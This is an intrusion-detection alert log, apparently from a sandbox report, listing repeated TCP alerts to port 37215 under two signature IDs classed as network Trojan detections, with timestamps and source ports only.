          Timestamp:06/08/24-15:05:24.351684
          SID:2835222
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188823
          SID:2835222
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145301
          SID:2829579
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406022
          SID:2835222
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471358
          SID:2829579
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152527
          SID:2835222
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804311
          SID:2835222
          Source Port:52354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516253
          SID:2829579
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2829579
          Source Port:59642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888266
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747165
          SID:2835222
          Source Port:41048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044209
          SID:2829579
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746696
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155341
          SID:2835222
          Source Port:59308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854728
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733982
          SID:2835222
          Source Port:36982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184657
          SID:2835222
          Source Port:59570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858407
          SID:2829579
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356981
          SID:2835222
          Source Port:56350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744132
          SID:2829579
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850456
          SID:2835222
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783583
          SID:2835222
          Source Port:48080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019197
          SID:2835222
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730208
          SID:2835222
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792519
          SID:2829579
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741765
          SID:2829579
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731348
          SID:2829579
          Source Port:33682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239930
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603402
          SID:2829579
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269382
          SID:2835222
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818970
          SID:2835222
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240542
          SID:2829579
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861524
          SID:2829579
          Source Port:52870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016875
          SID:2835222
          Source Port:38778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733251
          SID:2835222
          Source Port:33042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599236
          SID:2835222
          Source Port:37054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113945
          SID:2835222
          Source Port:50188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038019
          SID:2829579
          Source Port:47280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551998
          SID:2835222
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745637
          SID:2835222
          Source Port:49786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266450
          SID:2835222
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550163
          SID:2829579
          Source Port:43806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237977
          SID:2835222
          Source Port:54040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799953
          SID:2829579
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805842
          SID:2835222
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897117
          SID:2835222
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746339
          SID:2835222
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271673
          SID:2829579
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106303
          SID:2835222
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603115
          SID:2835222
          Source Port:46266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549682
          SID:2829579
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462208
          SID:2829579
          Source Port:58998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449698
          SID:2829579
          Source Port:43282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178888
          SID:2835222
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842310
          SID:2829579
          Source Port:33336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017622
          SID:2835222
          Source Port:57912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409913
          SID:2835222
          Source Port:58298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108033
          SID:2829579
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005720
          SID:2835222
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512923
          SID:2835222
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395407
          SID:2835222
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912428
          SID:2835222
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017818
          SID:2829579
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449753
          SID:2829579
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233578
          SID:2835222
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352165
          SID:2829579
          Source Port:43922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731599
          SID:2835222
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861366
          SID:2829579
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892826
          SID:2835222
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509429
          SID:2835222
          Source Port:34350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017870
          SID:2829579
          Source Port:58528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018302
          SID:2835222
          Source Port:54400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512510
          SID:2829579
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396340
          SID:2835222
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150790
          SID:2835222
          Source Port:57482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238399
          SID:2835222
          Source Port:35040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466073
          SID:2829579
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509911
          SID:2829579
          Source Port:34188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800600
          SID:2829579
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844049
          SID:2835222
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444298
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258687
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670499
          SID:2829579
          Source Port:51864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600366
          SID:2835222
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155859
          SID:2835222
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708136
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831137
          SID:2829579
          Source Port:33316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066333
          SID:2835222
          Source Port:42426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128079
          SID:2829579
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897684
          SID:2829579
          Source Port:33628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740479
          SID:2829579
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670263
          SID:2835222
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180333
          SID:2835222
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179596
          SID:2835222
          Source Port:37222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233538
          SID:2829579
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729357
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351832
          SID:2835222
          Source Port:50596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554108
          SID:2829579
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160816
          SID:2835222
          Source Port:49672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405887
          SID:2835222
          Source Port:37934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512610
          SID:2829579
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354545
          SID:2835222
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160657
          SID:2829579
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409434
          SID:2835222
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306570
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066376
          SID:2835222
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793224
          SID:2835222
          Source Port:38900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306464
          SID:2829579
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547434
          SID:2829579
          Source Port:35346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781121
          SID:2829579
          Source Port:59992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160609
          SID:2835222
          Source Port:48940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353509
          SID:2835222
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070895
          SID:2835222
          Source Port:39246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396340
          SID:2829579
          Source Port:53790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744940
          SID:2835222
          Source Port:56650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044898
          SID:2829579
          Source Port:35120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894298
          SID:2835222
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736669
          SID:2829579
          Source Port:34132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259632
          SID:2835222
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509791
          SID:2835222
          Source Port:59194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462938
          SID:2835222
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705583
          SID:2829579
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2829579
          Source Port:55298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161237
          SID:2835222
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2829579
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513232
          SID:2829579
          Source Port:33658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895718
          SID:2835222
          Source Port:38162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788431
          SID:2835222
          Source Port:37604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108676
          SID:2829579
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265990
          SID:2835222
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797492
          SID:2835222
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550985
          SID:2835222
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827509
          SID:2829579
          Source Port:55518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2835222
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742041
          SID:2835222
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672731
          SID:2835222
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113589
          SID:2829579
          Source Port:54820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707043
          SID:2835222
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159402
          SID:2829579
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742023
          SID:2835222
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014643
          SID:2829579
          Source Port:40786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2835222
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274259
          SID:2835222
          Source Port:44912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787411
          SID:2835222
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2835222
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741877
          SID:2829579
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823715
          SID:2835222
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734816
          SID:2835222
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516834
          SID:2829579
          Source Port:52354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267959
          SID:2835222
          Source Port:55134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158545
          SID:2829579
          Source Port:36664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857454
          SID:2829579
          Source Port:43278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188113
          SID:2835222
          Source Port:41088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041588
          SID:2829579
          Source Port:42982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781643
          SID:2835222
          Source Port:49626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782450
          SID:2829579
          Source Port:57968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516608
          SID:2835222
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466624
          SID:2829579
          Source Port:33458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019787
          SID:2835222
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672579
          SID:2835222
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549392
          SID:2829579
          Source Port:46248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159161
          SID:2829579
          Source Port:54486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059854
          SID:2829579
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706051
          SID:2829579
          Source Port:47162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667527
          SID:2835222
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019674
          SID:2829579
          Source Port:37642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782526
          SID:2835222
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177916
          SID:2835222
          Source Port:33880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729437
          SID:2829579
          Source Port:49390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461506
          SID:2829579
          Source Port:52444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603374
          SID:2835222
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148685
          SID:2835222
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159612
          SID:2835222
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463089
          SID:2835222
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153122
          SID:2835222
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2829579
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407204
          SID:2829579
          Source Port:49984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159399
          SID:2829579
          Source Port:50858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673438
          SID:2835222
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108829
          SID:2835222
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746926
          SID:2835222
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792219
          SID:2835222
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743562
          SID:2835222
          Source Port:47406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063054
          SID:2835222
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132736
          SID:2835222
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793204
          SID:2835222
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084720
          SID:2829579
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445003
          SID:2835222
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177759
          SID:2835222
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465881
          SID:2835222
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857677
          SID:2835222
          Source Port:60994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043959
          SID:2835222
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355435
          SID:2835222
          Source Port:34890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810503
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151389
          SID:2829579
          Source Port:43674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709083
          SID:2829579
          Source Port:54388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795780
          SID:2829579
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
